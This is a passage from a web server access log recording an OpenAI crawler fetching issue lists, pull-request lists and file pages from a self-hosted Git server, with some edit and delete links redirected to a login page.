"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:19:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15873] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:19:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118424] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118288] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118424] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 113315] [Gzip 6.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:19:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10052] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:30:18 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15888] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11306] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9859] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 7578] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 953] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17272] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fxref-gold_monitor_full.html" [Client 74.7.227.38] [Length 23953] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" -[17/Feb/2026:19:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" 